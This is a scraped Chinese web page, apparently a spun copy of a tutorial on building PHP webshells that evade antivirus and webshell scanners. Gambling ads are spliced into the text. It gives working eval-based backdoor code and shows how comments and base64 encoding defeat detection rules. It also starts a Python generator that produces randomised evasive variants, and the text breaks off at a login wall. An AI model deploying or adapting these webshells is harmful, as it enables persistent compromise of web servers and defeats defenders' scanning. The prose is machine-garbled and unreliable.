电银付安装教程(dianyinzhifu.com):行使注释及自定义加密免杀Webshell

admin/2021-01-01/ 分类:科技/阅读:

- 0x00:简介-

此篇只讨论php,实在原理是相同的,本文的思绪依然适用于其他语言
由于php7.1以后assert不能拆分了,以是此篇不使用assert函数作为焦点,使用适用性更广的eval。

免杀顺序依次为D盾 河马 webdir
0x01:探讨免杀

免杀D盾
首先我们需要领会免杀的原理,免杀实在就是绕过杀软的规则,而规则对我们来说是不透明的,然则可以凭据fuzz探知个也许。

首先请出我们的一句话木马:

<?php @eval($_POST('a'));?> 

无论若何混淆webshell,我们期望最终获得的逻辑依然是这条代码,以是谜底知道了,想办法混淆就行了。

经由对D盾的探测,可以知道,它对函数的检测实在是对照粗拙的,好比我们组织一个函数,让其返回值拼接为

eval($_POST['a']) 
<?php function x() { return $_POST['a']; } eval(x()); ?> 

D盾扫一下

被杀了,显然D盾并没有给出我们为什么这个会被杀,只说是已知后门,这里我们测试一下到底是什么器械被规则杀掉了。

,

欧博开户

欢迎进入欧博开户平台(Allbet Game):www.aLLbetgame.us,欧博开户平台开放欧博Allbet开户、欧博Allbet代理开户、欧博Allbet电脑客户端、欧博AllbetAPP下载等业务。

,

首先,无论若何更改函数名,都市被杀掉,以是和函数名没关系,然后就是eval内的参数了,测试后发现,只要拼接成eval($_POST['a'])就会被杀,因此我们制止语句直接拼接为这样即可。

若何制止直接拼接呢 固然是往中心加料了 加一些既不会损坏语法又能起到隔离作用的器械,什么器械可以做到这样呢?固然就是注释了

好比这样的:

<?php function x() { return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/"; } eval(x()); ?> 

这里用两段注释在"eval("与"$_POST"之间起到了隔离的作用,因此绕过了直接拼接这个规则,D盾继续杀一下


已经免杀乐成,再看一下能否使用


既然如此,我们的焦点绕过思绪就是行使注释了,为了去除特征,必不可少的就是随机性了

使用函数返回值与eval拼接只是权宜之计,究竟也是一条规则就能够被干掉的。

以是我们这里使用类和组织函数来替换自动挪用函数,

<?php class x { function __construct() { @eval("/*sasas23123*/".$_POST['a']."/*sdfw3123*/"); } } new x(); ?> 

改到这里,我不禁想 若是D盾发狠把".$_POST['a']."当自力规则,那岂不是也歇菜,以是,我决议使用base64编码将"$_POST['a']"转化一下

<?php class x { public $payload = null; public $decode_payload = null; function __construct() { $this->payload='ZXZhbCgkX1BPU1RbYV0pOw=='; $this->decode_payload = @base64_decode( $this->payload ); @eval("/*sasas23123*/".$this->decode_payload."/*sdfw3123*/"); } } new x(); ?> 

到现在为止,模板确认

后面就是写轮子了,至于轮子原理也很简单,就是将可以修改特征的参数名使用随机数填充,好比类名、public变量名、用于混淆的注释字符等。
代码如下:

import random ,author: pureqh ,github: https://github.com/pureqh/webshell shell = '''<?php class {0}{3}  public ${1} = null;  public ${2} = null;  function __construct(){3}  $this->{1}='ZXZhbCgkX1BPU1RbYV0pOw==';  $this->{2} = @base64_decode( $this->{1} );  @eval({5}.$this->{2}.{5});  {4}{4} new {0}(); ?>''' 
登录并阅读全文
阅读:
广告 330*360
广告 330*360

热门文章

HOT NEWS
  • 周榜
  • 月榜
Sunbet_进入申博sunbet官网
微信二维码扫一扫
关注微信公众号
新闻自媒体 Copyright © 2002-2019 Sunbet 版权所有
二维码
意见反馈 二维码